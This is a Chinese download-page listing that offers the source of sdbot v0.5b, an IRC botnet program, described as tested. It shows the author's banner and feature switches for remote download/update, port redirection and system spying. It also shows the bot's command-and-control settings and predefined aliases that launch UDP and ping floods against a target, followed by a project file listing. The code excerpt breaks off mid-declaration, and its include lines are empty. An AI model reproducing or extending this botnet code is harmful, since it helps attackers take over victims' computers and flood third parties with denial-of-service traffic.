资源简介
sdbot僵尸程序,基于IRC协议的僵尸网络程序 VC环境C语言开发,通过测试。
代码片段和文件信息
////////////////////////////////////////////
// //
// sdbot v0.5b by [sd] //
// //
// email: sdbot@mail.ru //
// icq: 21381594 //
// sonork: 100.2600 //
// web: http://sdbot.n3.net/ //
// //
// you can use this code however //
// you want as long as i‘m given //
// credit in some way. i don‘t //
// mind if you create bots based //
// on this as long as the words //
// ‘based on sdbot‘ are somewhere //
// in the program and its readme. //
// (the ‘about‘ command is a good //
// place for this). also no part //
// of this source code should be //
// used for illegal purposes. i //
// claim no responsibility for //
// what you do with this. //
// //
// THIS IS ONLY A TEST RELEASE. i //
// make no guarantees that this //
// will work or that it won‘t //
// damage your computer(or anyone //
// else‘s for that matter). use //
// at your own risk. //
// //
////////////////////////////////////////////
#include
#include
#include
#include
#include
#include
#include
#define WIN32_LEAN_AND_MEAN
// bot version (used in about/status/version reply)
#define vername “sdbot 0.5b“
// #define NO_IDENT // disables ident server
// #define NO_SPY // disables irc spy function
// #define NO_UDP // disables UDP functions
// #define NO_PING // disables ping functions
// #define NO_NETINFO // disables network info function
// #define NO_SYSINFO // disables system info function
// #define NO_REDIRECT // disables port redirect function
// #define NO_DOWNLOAD // disables downloading/updating functions
// #define NO_VISIT // disables visiting URLs
// #define NO_CONNCHECK // disables check for internet connection
// macro for predefined aliases. (these are just examples you can change them to whatever you want)
#define addpredefinedaliases() \
addalias(“opme“ “mode $chan +o $user“); \
addalias(“smack“ “action $chan smacks $1“); \
addalias(“u1“ “udp $1 10000 2048 50“); \
addalias(“p2“ “ping $1 10000 $2 50“); \
addalias(“ctcp“ “raw PRIVMSG $1 :$chr(1)$2-$chr(1)“);
// bot configuration
const char botid[] = “set_me“; // bot id
const char password[] = “set_me“; // bot password
const int maxlogins = 4; // maximum number of simultaneous logins
const char server[] = “set_me“; // server
const int port = 6667; // server port
const char serverpass[] = ““; // server password
const
属性 大小 日期 时间 名称
----------- --------- ---------- ----- ----
文件 280288 2009-10-27 19:02 sdbot\Debug\sdbot.ilk
文件 410624 2009-10-27 19:02 sdbot\Debug\sdbot.pdb
文件 135065 2009-10-27 19:01 sdbot\Debug\sdbot05b.obj
文件 140288 2009-10-27 19:02 sdbot\Debug\vc60.idb
文件 86016 2009-10-27 19:01 sdbot\Debug\vc60.pdb
文件 1203 2009-10-27 18:52 sdbot\ReadMe.txt
文件 4107 2009-10-27 19:05 sdbot\sdbot.dsp
文件 533 2009-10-27 19:05 sdbot\sdbot.dsw
文件 58368 2009-10-27 19:05 sdbot\sdbot.ncb
文件 48640 2009-10-27 19:05 sdbot\sdbot.opt
文件 768 2009-10-27 19:02 sdbot\sdbot.plg
文件 71393 2009-10-27 19:01 sdbot\sdbot05b.cpp
目录 0 2009-11-25 12:19 sdbot\Debug
目录 0 2009-11-25 12:19 sdbot
----------- --------- ---------- ----- ----
1237293 14
评论
共有 条评论